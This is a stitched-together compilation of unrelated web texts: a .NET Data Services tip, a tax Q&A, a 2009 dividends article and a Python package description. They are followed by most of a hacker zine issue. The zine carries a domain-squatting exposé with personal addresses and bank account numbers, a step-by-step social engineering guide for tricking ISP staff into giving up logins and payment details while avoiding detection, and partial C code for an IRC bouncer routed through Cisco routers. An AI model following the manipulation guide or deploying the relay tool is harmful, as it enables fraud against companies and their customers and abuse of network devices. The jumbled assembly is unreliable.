I like to tweet about React and post helpful code snippets. Follow me there if you would like some too!
https://linguinecode.com/post/how-to-add-onmouseenter-or-onmouseover-in-reactjs
The normal way that you create an ADO.NET Data Services (aka Astoria) service is by creating a class that derives from DataService<T>:

public class BloggingService : DataService<BloggingEntities>

And if you want to use Entity Framework under the hood, the T you supply must derive from ObjectContext.

Now this works great most of the time, but not with Code-Only, and here's why. Under the hood the DataService constructs an instance of the BloggingEntities and gets the model from it, via its MetadataWorkspace. The problem is that if you've configured the model using Code-Only, the only way to construct the BloggingEntities is via the Code-Only ContextBuilder, which Astoria knows nothing about.

Hmm….

Thankfully there is a very simple workaround: you simply override CreateDataSource() on DataService<T>, like this:

protected override BloggingEntities CreateDataSource()
{
    // Code-Only code goes here:
    var contextBuilder = GetConfiguredContextBuilder();
    var connection = GetSqlConnection();
    return contextBuilder.Create(connection);
}

As you can see this is pretty simple. Note that CreateDataSource() returns the T of DataService<T>, here BloggingEntities, not the service class itself.

Fine Print

For performance reasons it is important to avoid the cost of re-configuring the ContextBuilder each time, so the GetConfiguredContextBuilder() method should create and configure the builder only once, and cache the builder for subsequent calls.

Caveats

This tip will only work on .NET 4.0 Beta 2 and above. Code-Only only works on .NET 4.0 and is only available as a separate download. ADO.NET Data Services (aka Astoria) is *going* to ship as part of .NET 4.0, but isn't in Beta 1, so you can't use Code-Only with Astoria yet; you have to wait for Astoria to show up in .NET 4.0 in Beta 2, and you will probably want to wait for another drop of Code-Only too. Which simply means you will have to wait a little while before you can try this tip out.
https://blogs.msdn.microsoft.com/alexj/2009/10/14/tip-38-how-to-use-codeonly-with-astoria/
Tax

Have a Tax Question? Ask a Tax Expert

Hi,

First some good news: Tennessee doesn't have an income tax. The state does, however, levy a tax on interest and dividend income over $1,250 per person. And just as a heads up, like most states with no income tax, Tennessee does have a relatively high sales tax rate of 7% on general merchandise and 5.5% on food. In addition, individual counties levy their own sales tax above and beyond the state sales tax.

Thanks, so likely KY will continue to tax my income even though I am living in TN? The W-2 for investment income would be delivered to my KY residence, as we are maintaining that as our home.

If you keep your residency (measured by facts and circumstances, such as keeping the home, intent to come back, wife staying, etc.) ... ah, beat me to it ... yes, the W-2 being sent there makes it very clean. You'll still be taxed on all income as a KY resident. From a tax perspective it will really be as though nothing changed ... ALTHOUGH you may be able to use Form 2106 (unreimbursed employee expenses) to deduct anything required by the company but NOT reimbursed.

Here ya go, in the event that it's useful: Form 2106 and Instructions for Form 2106 (HTML)

Great, thanks. So to sum it all up: I would have to see if Kellogg would list my address as KY and withhold taxes for KY, or, if they listed my address as TN (since they are calling this a relocation) and did not withhold income taxes for either state, would KY have any argument to then tax that salary income even though I was working out of state, because we maintained the KY home? That's where I am really confused.

Yes, don't shoot the messenger here, but KY WILL say that you are still a KY resident, and therefore taxed on all income ... IF you were going to a state with an income tax that would require you to file an NR return (non-resident tax return), then KY does have a credit for taxes paid to another state - so there's no DOUBLE taxation ...
... but in this scenario you'll be considered a KY resident by the KY Dept. of Revenue, because of keeping the domicile and your intent to return.

No shooting, I promise :). Kind of figured that would be the case; had a similar scenario a few years back with Michigan, but they did have income taxes, so I was filing estimated payments with KY while Michigan was being withheld, and then got everything back from Michigan through the non-resident filing. Thanks a lot for your help. Helps to make the decision about accepting or not a little easier.

Your employer IS supposed to withhold for your state of residency, that's the law ... however, if they play hardball with you about that, then (as you've just mentioned) you can pay estimated to KY.

Congrats on the offer ... bet TN will be nicer than MI?

It was a screw-up in their payroll department, got it cleared up after the first year. IDK about nicer, although they did have snow in MI last night, none here YET! THANKS AGAIN

Hi Greg, ... just checking back in here, as I never saw you come back. Let me know if you have any other questions, Lane
https://www.justanswer.com/tax/83zcg-hi-opportunity-kellogg-require.html
This year saw record cuts in payouts, but companies may be more generous to shareholders in 2010

What was generally a good year for stocks was a terrible year for dividend-focused investors. In 2009, dividend payouts from the large-cap Standard & Poor's 500-stock index are set to fall $52.6 billion, or 21.4%, from 2008, according to Standard & Poor's projections. In dollars, that is the largest decline ever, and in percentage terms it's the biggest drop since 1938, when dividends fell 38.6%.

Adding insult to injury for shareholders: Dividend-yielding stocks tended to lag the broader stock market in the past year, reflecting a market bias toward tech stocks and risky companies, which generally weren't paying dividends to begin with. "What is typically a defensive strategy in down markets turned out to be the wrong way to go," says Keith Goddard, co-manager of the Capital Advisors Growth Fund (CIAOX).

Dividend stock strategies are popular among conservative investors seeking consistent income. But the financial crisis robbed these shareholders of billions, as financial firms, particularly banks and real estate investment trusts, slashed payouts. From September 2008 to March 2009, S&P 500 companies stopped paying $65.4 billion in dividends. Of that amount, 68% was due to cuts at financial firms. "The big cuts have really been detrimental to dividend investors," says Mitch Schlesinger, chief investment officer at FBB Capital Partners.

Dividend Rebound

For the first time in a while, these investors have reasons for hope. Dividend-watchers like Standard & Poor's index analyst Howard Silverblatt predict dividends will rebound in 2010. The main reason: Companies that used to pay big dividends, like General Electric (GE), Bank of America (BAC), and Citigroup (C), have already made deep cuts. "The dividends, we believe, will come back, but they're going to be slow" in returning, Silverblatt says. It could be 2013 before dividend payouts return to their previous peak, he says.
Optimism about 2010 dividends requires at least some belief that the economy won't get worse and may even improve significantly. "If a company has made it to this point in the economic cycle without having to cut its dividend, I'd say [its chances for] cuts are behind us," Goddard says.

But Cliff Draughn, chief investment officer at Excelsia Investment Advisors, is more skeptical. He worries about where the cash for dividends will come from. Companies have maintained payouts by cutting jobs and other expenses as revenues have fallen. In 2010, the economy is likely to remain weak, he says. So, if there is any increase in costs, such as higher health-care expenses or commodity prices, "you're probably going to see more cuts in dividends," Draughn says.

Attractive Yields

The current dividend yield on the S&P 500 is 2.16%. That's low by historical standards. Since 1935, the yield has averaged 3.8%. Current dividend yields are attractive, however, compared with the rock-bottom interest rates now on many bonds and money-market funds.

Dividend investors are closely watching banks for signs that the financial sector can start rebuilding dividends devastated by the crisis. Hopes were raised by the recent news that all major banks, including BofA, Citi, and Wells Fargo (WFC), have paid back federal Troubled Asset Relief Program, or TARP, bailout funds. Banks have profited off low interest rates, and have been setting aside billions of dollars to cover loan losses, Goddard says. Once those loan losses level off, banks may start raising payouts again, he says.

Draughn, however, worries about commercial real estate problems looming on bank balance sheets. Banks paid back TARP funds not necessarily because they could afford to do so, he says, but to get out from under federal limits on executive pay. "The reason they paid back TARP was not in the interests of shareholders," he says.

The prospects for dividends vary from sector to sector.
Schlesinger believes utilities may be able to boost payouts as uncertainty clears up about federal climate change legislation. "There have been political worries," he says, and utilities "have been hoarding their cash a bit."

Dividends on consumer discretionary stocks could be hurt by slow sales, Draughn warns. "The consumer is still retrenching," he says. "They're still rebuilding balance sheets."

Bright Spot: Consumer Staples

Consumer staples stocks, however, have been a rare success story for dividend investors. In 2009, consumer staples stocks have risen only 13%, compared with a 22.5% rise for the S&P 500 as a whole. But the sector fell less in 2007 and 2008, and its dividend payments have remained generous. Only one consumer staples stock in the S&P 500, grocery retailer Supervalu (SVU), has cut its dividend, while 33 of 34 actually increased payouts, S&P's Silverblatt notes. As a result, consumer staples is the only sector to offer investors a positive total return (including price appreciation and dividend payments) since the market peak of 2007.

Through history, dividends have been an important part of stock investors' total market returns. They offer shareholders income and can help keep stock prices stable. The next few years, however, could require patience from investors eager for income. Dividends may gradually recover, but they're crawling their way out of a very deep hole.
http://www.bloomberg.com/bw/stories/2009-12-21/dividends-a-slow-recovery-in-2010businessweek-business-news-stock-market-and-financial-advice
A wrapper around the etcd3 package

Project description

etcd3_wrapper

A thin wrapper around the Python module etcd3 to make it a little easier to deal with etcd.

Warning: The API isn't fully stable and can change significantly in the future.

For example, say you want to get an entry from etcd. You would write something like this:

from etcd3_wrapper import Etcd3Wrapper

client = Etcd3Wrapper()
entry = client.get("/planet/earth")
if entry:
    # It would print the key and value of the entry
    # in bytes format b'....'
    print(entry.key, entry.value)

Output

b'/planet/earth' b'{"population": "7.53 Billion"}'

If you know that the value in etcd is in JSON format, you can do the following:

json_entry = client.get("/planet/earth", value_in_json=True)
if json_entry:
    # Now, json_entry.value is of type dict
    print(json_entry.key, json_entry.value)

    # So, you can do this too
    print(f"Earth population is {json_entry.value['population']}")

Output

/planet/earth {"population": "7.53 Billion"}
Earth population is 7.53 Billion
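The value_in_json convenience is easy to picture without a running etcd server. Below is a minimal, hypothetical sketch of just the decoding step; EtcdEntry and decode_entry are illustrative names, not etcd3_wrapper's actual internals:

```python
import json
from dataclasses import dataclass

@dataclass
class EtcdEntry:
    """A returned etcd entry: raw bytes key, and a raw or JSON-decoded value."""
    key: bytes
    value: object

def decode_entry(key: bytes, value: bytes, value_in_json: bool = False) -> EtcdEntry:
    # When value_in_json is set, decode the stored bytes as UTF-8 JSON
    # so callers get a dict back instead of raw bytes.
    if value_in_json:
        return EtcdEntry(key=key, value=json.loads(value.decode("utf-8")))
    return EtcdEntry(key=key, value=value)

# Using the record from the example above (no etcd required):
entry = decode_entry(b"/planet/earth", b'{"population": "7.53 Billion"}',
                     value_in_json=True)
print(f"Earth population is {entry.value['population']}")
# prints: Earth population is 7.53 Billion
```

The real wrapper performs the same kind of decode after fetching the key from etcd; this sketch only isolates the JSON step.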
https://pypi.org/project/etcd3-wrapper/
Keen Veracity Issue 14 - This issue has articles entitled Squatters Exposed!, The Art of Social Engineering, ciscoBNC.c, Wireless Technology Exposed, and more. 05fea62d4b2eff64b235e68f40ad467e -------------------------------------------------------------------------------- _ _ _ _ _ | | / ) | | | | (_)_ | | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _ | |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | | | | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| | |_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ | (____/ -------------------------------------------------------------------------------- I S S U E (14) L e g i o n s o f t h e U n d e r g r o u n d ----------------------------------------------------[]----------- -------------------------------------------------------------------------------- lothos Digital Ebola Firewa11 DataShark Overdose1 Phriction ntwak0 pr00f havoc TouchTone archim phemetrix crabby gridmark bantrix -------------------------------------------------------------------------------- [CONTENTS]------------------------------------------------------------[CONTENTS] [1]====================================[Editorial - Lothos <lothos@lothos.org> ] [2]============================================[Squatters Exposed! 
- Anonymous ]
[3]========================[The Art of: Social Engineering - danny@away.net.au ]
[4]=======================================[ciscoBNC.c - chrak <chrak@b4b0.org> ]
[5]===================[Wireless Technology Exposed - Vortek <vortek@gmail.com> ]
[6]==================================[Harriet the Spy - Dreid <dreid@dreid.org ]
[7]=============================================[Review of ToorCon - Overdose1 ]
[8]=====================================================[This issues LAMER.log ]
[9]==============================================================[/dev/urandom ]
[CONTENTS]------------------------------------------------------------[CONTENTS]
--------------------------------------------------------------------------------
[Editorial]=========================================[Lothos <lothos@lothos.org>]
--------------------------------------------------------------------------------

When I decided to take over the job of editing Keen Veracity, Legions of the Underground was dead. Maybe not maggot-ridden dead, but on life support kind of dead. The last issue of Keen Veracity, kv13, was released over a year ago, and that was just a rehash of old articles with little original content, so it hardly counts. I can understand the old school articles, because it's difficult to pull something together when the group doesn't contribute. The last kv with original content, kv12, was published 7-27-2002, over three years ago. That issue had over 21 original articles written by group members and others. This issue, as you can see, has 9, which is sad because Keen Veracity used to be a quality magazine that was well respected in the security community.

I have tried to breathe some life into Legions of the Underground. For years now the members have done nothing constructive, have released no code, no advisories, nothing. I have tried to get it going again with a new issue of Keen Veracity, but the only other member to contribute something was overdose1.
(Thanks bro) The irc channel, #legions on undernet, had degraded as well. People brought their girlfriends into the channel, there was a lot of drama involved with that, and there was a lot of other infighting and dick-waving. DigiEbola, our "leader," was one of the biggest dick-wavers when he was supposed to be holding everything together; instead he was banning people for no reason other than that he didn't like what they said. A lot of members have confided in me that they're not happy with digi but are afraid to say anything for fear of being banned.

I registered the #legions channel with undernet channel services in an effort to provide some stability for the channel. Everyone who had ops received ops on X, no one was banned anymore for their opinions, and I figured it was a good move to make. A few people didn't see it as I did. Digi was upset because he lost control over the channel. Another member accused me of "taking over" the channel. I don't see how it could be considered a takeover, since everyone who had ops before the registration was given ops after the channel registration. Nothing changed, with the exception that people now got auto-opped when entering the channel. Big deal.

Anyways, I'm the most senior member still in the group. From the first published members list of Legions of the Underground, from KV3: optiklenz cap n crunch tip icer Bronc Buster sreality Zyklon havoc HyperLogik Defiant Duncan Silver Slfdstrct lothos

I don't see DigiEbola listed there, and I don't see how my registering the channel on undernet was considered a "takeover." As the most senior group member left, there is an argument that I should inherit Legions of the Underground to counter the "takeover" cry. Our current "leadership" definitely isn't doing the job. I have put a lot of time, energy, effort and hard work into this group, and I wasn't content to sit back and let it die.
I had considered becoming the new group leader, weeding out the stagnant members and adding some new blood from the people I had recently brought to the irc channel. Unfortunately digi controls the domain name, and while I could always get a new domain, I frankly don't believe it's worth the effort anymore.

I hereby resign my membership from Legions of the Underground. It's been a wild ride and I enjoyed every minute of it, but it's time to move on to bigger and better things. I've made a lot of good friends along the way, and hope nothing will change that. I have tried as best as possible to refrain from airing our dirty laundry in the public, but some things just had to be said. Nothing personal was meant by any of this, and Digi, please don't take my comments personally. I know we've butted heads over the future of legions; it wasn't personal, and I still consider you a friend. I will be transferring ownership of the #legions undernet channel to you, effective immediately.

Lothos - lothos@lothos.org

And now, on with the show. I have decided not to include my article in this issue; it may be released later on my website. Anyways, I hereby present you with what is likely the last issue of Keen Veracity. Enjoy!

--------------------------------------------------------------------------------
[Squatters Exposed!]=================================================[Anonymous]
--------------------------------------------------------------------------------

Squatters Exposed!
by anonymous

I had my domain name stolen by squatters. Now, before you start complaining that I should have renewed it if I wanted to keep it, let me explain. When your domain expires, it goes into a redemption period where it can be renewed. In my case, the redemption period was cut short and I was unable to renew my domain. My domain was stolen by a group of squatters who also happen to be spammers, pornographers, and domain registrars. How this group became domain registrars is beyond me.
Now, before I get ahead of myself, a little background information and some detective work. This is the relevant whois data from my domain:

Sponsoring Registrar:Intercosmos Media Group Inc. (R48-LROR)
Registrant ID:ODN-676871
Registrant Name:Orion Web
Registrant Organization:Orion Web
Registrant Street1:1st Floor Muya House
Registrant Street2:Kenyatta Ave.
Registrant Street3:p. o. box 4276-30100
Registrant City:Eldoret
Registrant State/Province:KE
Registrant Postal Code:30100
Registrant Country:KE
Registrant Phone:+254.0735434737
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:info@kenyatech.com

The admin and tech contacts are the same as above.

Name Server:NS0.DIRECTNIC.COM
Name Server:NS1.DIRECTNIC.COM

This shows that a company called Orion Web in Kenya, Africa now owns my domain. Pulling up the web page for my domain shows a page filled with ads, with a "Click here to buy this domain" button that leads to the site of the company that now owns my domain name. They also own lots of other domain names. Lots and lots, in the range of 140,000 or more.

Kenyatech claims that they're located in Kenya, Africa. They also accept PayPal. PayPal does not do business with firms located in Kenya. Using GeoBytes to look up the site's IP address, 209.16.83.2, reports that it is located in Larose, Louisiana. Looking up the same address in the ARIN database shows this IP is assigned to I-55 Internet Services in Hammond, Louisiana.

A little research on the site, browsing through all the domains, shows a few patterns. The oldest dated domain I could find registered to them was in August of 2004. The most current I could find was August 23, 2005, a week before this writing. Most are registered to kenyatech, but some of the older ones are registered to:

NOLDC, Inc.
838 Camp Street
4th Floor
New Orleans, LA 70130
US
504-523-0360

Some of the domains are registered to Domain Contender, with the majority being registered through InterCosmos Media Group, DBA directnic.com.
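Detective work like the above is easy to automate. Here is a small Python sketch (the helper name extract_fields is hypothetical, and whois field labels vary by registry, so treat it as illustrative only) that pulls the interesting registrant fields out of a raw whois record like the one shown:

```python
def extract_fields(whois_text,
                   wanted=("Sponsoring Registrar", "Registrant Name",
                           "Registrant Country", "Registrant Email")):
    """Collect selected 'Label:value' lines from a raw whois record."""
    fields = {}
    for line in whois_text.splitlines():
        # whois output is one "Label:value" pair per line; split on the
        # first colon only, since values may themselves contain colons.
        label, sep, value = line.partition(":")
        label, value = label.strip(), value.strip()
        if sep and value and label in wanted:
            fields[label] = value
    return fields

# Sample record taken from the whois data shown above.
record = """Sponsoring Registrar:Intercosmos Media Group Inc. (R48-LROR)
Registrant Name:Orion Web
Registrant Country:KE
Registrant Email:info@kenyatech.com"""

for label, value in extract_fields(record).items():
    print(f"{label}: {value}")
```

Run against a batch of whois records, a loop like this makes the registrar and country patterns described here jump out quickly.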
Curious about where they're from? They're both owned by the same people, and the address is:

650 Poydras Street
Suite 1150
New Orleans, LA 70130
US
(504) 679-5170

Is it just me, or is there a pattern developing with all these Louisiana addresses? The Camp Street address and the Poydras Street address are within blocks of each other.

I filled out a form on their site offering to buy the domain for $50. This offer was turned down. They instead suggested that I pay $300 plus a $30 fee, according to the following:

Hello,

NOLDC, Inc. accepts wire, money order or certified or cashiers check (international checks please add an additional US$50 processing fee) only. Checks and money orders must be made payable to NOLDC, Inc., and sent to:

NOLDC, Inc.
838 Camp St., 4th Floor
New Orleans, Louisiana 70130

NOLDC, Inc. Wire Information (Note: Please be sure to add wire fees to final price of domain purchase. Also, be sure to include the domain name that you are purchasing in the Additional Information Section.)

Wire Fees for US Banks is $10.00
Wire Fees for Banks outside of the US is $50.00

Bank: Hibernia Bank
2412 Manhattan Blvd
Harvey, La 70058
USA
ABA#: 065000090
Account#: 2080083613
Swift Code: HIBKUS44
Beneficiary: NOLDC, Inc.
650 Poydras St Ste 1150
New Orleans, La 70130
USA

Sincerely-
NOLDC, Inc.

This links the Camp Street address with the Poydras Street address, by their own admission. Now, who owns Intercosmos a.k.a. directnic.com, who owns Domain Contender, and who owns NOLDC, Inc.? A man by the name of Sigmund Solares. I suspect that kenyatech.com is also owned by Sigmund Solares, given all the evidence provided above. Sigmund Solares has a history of domain squatting, and a history of hiding behind non-existent entities for the purpose of hiding his squatting. This WIPO arbitration decision clearly outlines this:

Complainant claims that Respondent has no rights or legitimate interests in the disputed domain name.
According to Complainant, this conclusion is suggested by Respondent's name: "Legal Services." Additionally, based on an investigation conducted by Complainant, Complainant claims that Legal Services is a fictitious identity adopted for the sole purpose of registering the disputed domain name. According to the investigation report there is no business by the name of Legal Services at the address listed in the .biz Whois database. Further, there is no business by the name of Legal Services at the address provided in the registration information. The only business listing found at that address is a business called "Ingrid's Beauty Salon."

Likewise, the telephone number listed in the .biz Whois database is the number for an individual named "Sigmund Solares" who claims that he is not affiliated with Respondent. In fact, according to Complainant, Sigmund Solares is a principal in and primary contact for the Registrar of Respondent's domain name. Based on the above, Complainant asserts that Respondent has taken active steps to conceal its true identity and provided false contact details in connection with its domain name registration. Complainant concludes that the use of false and misleading contact information suggests that the domain name was registered for improper purposes. Complainant also asserts that the fact that its trademark has a strong reputation and is widely known is further support of Respondent's bad faith.

Finally, Complainant notes that the administrative, billing and technical contacts for the registration is Joseph Tambert whose e-mail address is listed as "josephtambert@homeville.com". Complainant states that the website at <homeville.com> is a pornographic website. Thus, Complainant claims that a risk exists that Complainant's valuable and well-known trademark and service mark will be associated with a pornographic site and will be tarnished as a result.

SOURCE:

Joseph Tambert may be Sigmund's partner.
This is his address:

Joseph Tambert
838 Camp Street
New Orleans

Notice the Camp Street? Sigmund and Joseph are linked together on the whois info for fbi.biz, as well as the above arbitration case. Joseph's email address, as explained in the above WIPO arbitration quote, links to a pornographic website. Sigmund's email, as listed on the whois for sigmundsolares.com, also points to a porn site.

This group has had IP addresses blocked for sending spam. They have a history of domain squatting. How the hell did they become domain registrars?

Being domain registrars gives them access to the whois database. I believe that they use that access to acquire a list of domains entering the expiration period. They would then be able to flag such a domain as being under their control, allowing them to transfer ownership to the Kenyatech entity and cut short the redemption period.

There is also evidence that suggests they abuse the whois database. The whois database is used to find information on a domain name, including whether it is available for purchase. They may have access to which names are looked up, and whether they are available, and there is evidence to suggest that they register these names for themselves before others have a chance to.

They also have a script on every domain they own, to judge the domain's popularity. This script stores its data on a machine owned by directnic.com. The more popular sites have to pay more money to buy the domain back. I have seen less popular sites go for as little as $50, and I've seen some offers of a thousand dollars turned down. The more popular sites are renewed, and the less popular are allowed to expire. Being domain registrars, they might not have had to pay anything to acquire the 144,000+ domains they own.

So, what can you do? If your domain was snatched, by all means don't visit it or the kenyatech web site. Hopefully it will be allowed to expire. Contact anyone linking to your website, and have them change the link.
If you have a popular domain, your only hope may be to go through arbitration, or sue. There is a class action lawsuit being organized by rederon.net. Complain to ICANN.org, and hopefully we can have their domain registrar status revoked. By all means, don't pay them and support their bad habits!

[ Editor's note: I also had my domain stolen by kenyatech.com, so when I received this I couldn't resist including it. The domain name was for RootFest, my computer security convention held in Minneapolis, Minnesota. I am selling RootFest t-shirts to raise the funds needed to get my domain back. If you're interested in supporting me, or just want to know more about my specific case, please visit. -lothos ]

--------------------------------------------------------------------------------
[The Art of: Social Engineering]====================[danny\ <danny@away.net.au>]
--------------------------------------------------------------------------------

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%        The Art Of:           %%
%%     Social Engineering       %%
%%                              %%
%% danny\ <danny@away.net.au>   %%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
**********************************

%%%%%%%%%%%%%%%%%%%
%% Introduction: %%
%%%%%%%%%%%%%%%%%%%

Social engineering is one of the most effective ways of pulling off some of the largest security breaches. With a combination of being technically savvy and being organised and believable, you are a major security threat. In this paper, I hope to help unleash, and evolve, the social engineering skills within you, because of course, everyone has social engineered at some stage in their life.

%%%%%%%%%%%%%%%%%%%%%%%%%%
%%       What Is:       %%
%%  Social Engineering  %%
%%%%%%%%%%%%%%%%%%%%%%%%%%

Social engineering is deceiving and manipulating a target.
Social engineering tactics are usually carried out with the medium of a telephone; it's easier to attack without being seen, and when carried out correctly, the attack is mostly flawless, granted that you manipulate the operator into believing that you are actually who you say you are. For most operators, if someone rings up, it's not out of the ordinary to be requesting information, and their job description consists of supplying you with this -- it's not hard to get something you want from someone that is offering it to you!

%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Doing Your Homework: %%
%%%%%%%%%%%%%%%%%%%%%%%%%%

Doing your homework on the target that you will be attempting to gain information from is a vital part of the social engineering process. You need to know what you want, how you want it, and you have to get the point across with a very positive and confident attitude -- make it believable! Do not stumble over your words; everything has to be clear, concise and professional. When studying the target, it is essential to only concentrate on the details that actually matter. Study the terminology used in the industry; you don't want to sound clueless when asked a question. Background information is imperative.

%%%%%%%%%%%%%%%%%%%%%%%%
%% Being Manipulative %%
%%%%%%%%%%%%%%%%%%%%%%%%

Being manipulative when carrying out a social engineering attack is a necessity; this is how you will influence the target, getting them to do exactly what you want without them even realising it. It's a very skillful, under-the-radar technique that will help you greatly. Again, being manipulative means you have to be familiar with the target. Referring back to the "Doing Your Homework" section: study the corporate information of the target, find out how their operation runs, and use it to your advantage. Use the operator's name when being greeted; it's usually procedure for them to introduce themselves on the call -- this shows that you are calm, confident, and alert.
Refer to an employee that works there; this gives the operator the impression that you are familiar with the company, and takes the call to a more personal level. This relieves the thought of them thinking otherwise when you request the information you desire.

There are two levels you can manipulate on. You can either claim to be a customer of the target, used to obtain legitimate customers' account information, or claim to be a staff member in another department/employee of a company that the target deals with.

NOTE: Both can be very effective if the attack is carried out correctly.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%    Finding A Target:   %%
%% Practice Makes Perfect %%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Before attempting to carry out a social engineering attack on a high profile target, practicing on smaller, more vulnerable companies is very valuable; there's no room for mistakes, especially when the consequences can mean a pretty heavy jail term.

Attempt to social engineer your local ISP; most local ISPs resell their services from a larger mainstream provider. Claim to be an employee of the company which resells their services to the target; remember to introduce yourself in a clear and concise manner, sound confident, and ask for the right people in the correct department. This opens an array of doors as to where you want to take the attack, whether it be updating their payment details in your system, or confirming radius server logins for an urgent security maintenance which needs to be undertaken immediately on their managed server -- have this planned. You need to know exactly what you have to say at every step of the call; do not miss a beat.

Do not sound too eager to gather the information; remember, manipulate them. Make them believe that it is a security issue on their behalf, and that without the proper fix, their current operation won't be running smoothly; it's all about them! Advise them on how long it will be before the maintenance is complete.
Once the supposed maintenance has been completed in the timeframe you have given them, provide them a courtesy callback that the issue has been resolved. This strikes out the risk of them calling the mainstream provider to see what's happening with the update, and minimises the risk of being caught.

%%%%%%%%%%%%%%%%%%%%%%%%%%
%%   Easy? Not Quite.   %%
%%%%%%%%%%%%%%%%%%%%%%%%%%

It's not always going to be so easy. At times you may find yourself in a heated situation; remain calm, stay in character, offer a callback from one of your superiors to have the situation sorted out -- do whatever is necessary. Remember, once you start digging your way through the inner workings of a target, it's only going to get harder. The most vulnerable part of a company is its employees. Operators may be easy to exploit, but when speaking to senior representatives and executives of the company, it's going to be a whole lot more challenging.

%%%%%%%%%%%%%%%%%%%%%%%%%%
%%      Conclusion      %%
%%%%%%%%%%%%%%%%%%%%%%%%%%

So, this concludes my paper. Hopefully this outlines what you need to know on your journey as a Social Engineer. There are social engineers everywhere, so the next time you pick up a call, you may have to try twice as hard to identify who you are actually talking to! Have Fun!

%%%%%%%%%%%%%%%%%%%%%%%%%%
%%      References      %%
%%%%%%%%%%%%%%%%%%%%%%%%%%

Here's some papers and books that will help you.
There are a lot of factors to cover; please visit some of these offsite links for your benefit:

- Paper: Social Engineering
- Link:
- Author: Aaron Dolan

- Book: The Art Of Deception: Controlling the Human Element of Security
- Link:
- Author: Kevin Mitnick

- Paper: Social Engineering: It's a matter of trust
- Link:
- Author: Douglas Schweitzer

--------------------------------------------------------------------------------
[ciscoBNC]==============================================[Chrak <chrak@b4b0.org>]
--------------------------------------------------------------------------------

[ Editor's note: Chrak was supposed to do a writeup of this for KV, but he's been missing in action for a while. I decided to include it as is. ]

/* Written 2005 by chrak <chrak@b4b0.org> <>
   shoutoutz to #b4b0 and #c1zc0 @ EFNet

   ircclient -> ciscoBNC -> router -> ircserver

   /server ciscoBNCserv 7777
   /quote doitup 1.1.1.1 mypass irc.LOL.com 6667

   this is version 0.9, next will have more bug fixes, error checking,
   password protection, ability to disconnect and resume irc sessions,
   lists of DOITUPs stored! can someone email me if they know how to
   turn off IOS> shell echoing?

   This code is distributed under the GNU Public Licence (GPL) version 2.
   See for further details of the GPL. If you do not have a web browser
   you can read the LICENSE file in this directory.
**/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <signal.h>
#include <time.h>

#define D_VER "0.9"
#define D_PORT "7777"
#define D_REALNAME "ciscoBNC user"

int create_server (unsigned int port);
int server_notice (int sock, char *msg);
int server_notice_from (int sock, char *msg, char *from);
int serve_client (int sock);
int relay_client_and_router (int sock, int r_sock);
int rnd1toN (int max);

void
startdaemon (void)
{
  switch (fork ()) {
    case -1:
      perror ("fork()");
      exit (1);
    case 0:   /* child */
      break;
    default:  /* parent */
      exit (0);
  }
  if (setsid () == -1) {
    perror ("setsid()");
    exit (1);
  }
  //fclose(stdin);
  //fclose(stdout);
}

// vhost = NULL for no bind()
int
connect_to_tcphost (const char *hostname, unsigned int port, const char *vhost)
{
  int sock;
  struct hostent *he, *hel;
  struct sockaddr_in saddr;
  struct sockaddr_in localaddr;

  if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
    perror ("socket()");
    return -1;
  }
  if (vhost) {
    if ((hel = gethostbyname (vhost)) == NULL) {
      herror ("gethostbyname()");
      close (sock);
      return -1;
    }
    memset (&localaddr, 0, sizeof (struct sockaddr_in));
    localaddr.sin_family = AF_INET;
    localaddr.sin_port = 0;
    localaddr.sin_addr = *((struct in_addr *) hel->h_addr);
    /* this is to use VHOST */
    if (bind (sock, (struct sockaddr *) &localaddr, sizeof (localaddr))) {
      perror ("bind()");
      close (sock);
      return -1;
    }
  }
  if ((he = gethostbyname (hostname)) == NULL) {
    herror ("gethostbyname()");
    close (sock);
    return -1;
  }
  saddr.sin_family = AF_INET;
  saddr.sin_port = htons (port);
  saddr.sin_addr = *((struct in_addr *) he->h_addr);
  if (connect (sock, (struct sockaddr *) &saddr, sizeof (struct sockaddr)) == -1) {
    perror ("connect()");
    close (sock);
    return -1;
  }
  return sock;
}

int
readline_from_sock (int sock, char *line, int max_read)
{
  int i = 0, retval = 0;

  bzero (line, max_read);
  retval = recv (sock,
                 line, max_read, MSG_PEEK);
  while (line[i] != '\n' && i != max_read && i != retval)
    ++i;
  retval = read (sock, line, ++i);
  line[i] = '\0';  /* terminate the string */
  // sloppy but to kill it
  if (strlen (line) == 0) {
    fprintf (stderr, "KILLING THIS CONNECTION\n");
    exit (0);
  }
  return retval;
}

int
main (int argc, char *argv[])
{
  int sock, csock;
  socklen_t l;  /* accept() wants a socklen_t, not an int */
  struct sockaddr_in caddr;

  fprintf (stderr,
           "ciscoBNC V%s\nrun with additional arg to make daemon (%s -)\n(chrak@b4b0.org) ()\non port %s\n",
           D_VER, argv[0], D_PORT);
  if ((sock = create_server (atoi (D_PORT))) == -1) {
    // change to stdout so we can see it from PHP!!@!@
    fprintf (stderr, "create_server FAIL\n");
    exit (-1);
  }
  if (argc > 1)
    startdaemon ();
  // stop zombies
  signal (SIGCHLD, SIG_IGN);
  while (1) {
    l = sizeof (struct sockaddr_in);
    if ((csock = accept (sock, (struct sockaddr *) &caddr, &l)) == -1) {
      perror ("accept()");
      exit (-1);
    }
    fprintf (stderr, "connection from: %s\n", inet_ntoa (caddr.sin_addr));
    switch (fork ()) {
      case -1:
        perror ("fork()");
        //write(csock,"fork():ERROR\r\n",strlen("fork():ERROR\r\n"));
        exit (1);
      case 0:   /* child */
        server_notice (csock, "connected to ciscoBNC!");
        serve_client (csock);
        close (csock);
        exit (0);
      default:  /* parent */
        close (csock);
    }
  }
}

int
create_server (unsigned int port)
{
  int sock, l = 1;
  struct sockaddr_in saddr;

  if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
    perror ("socket()");
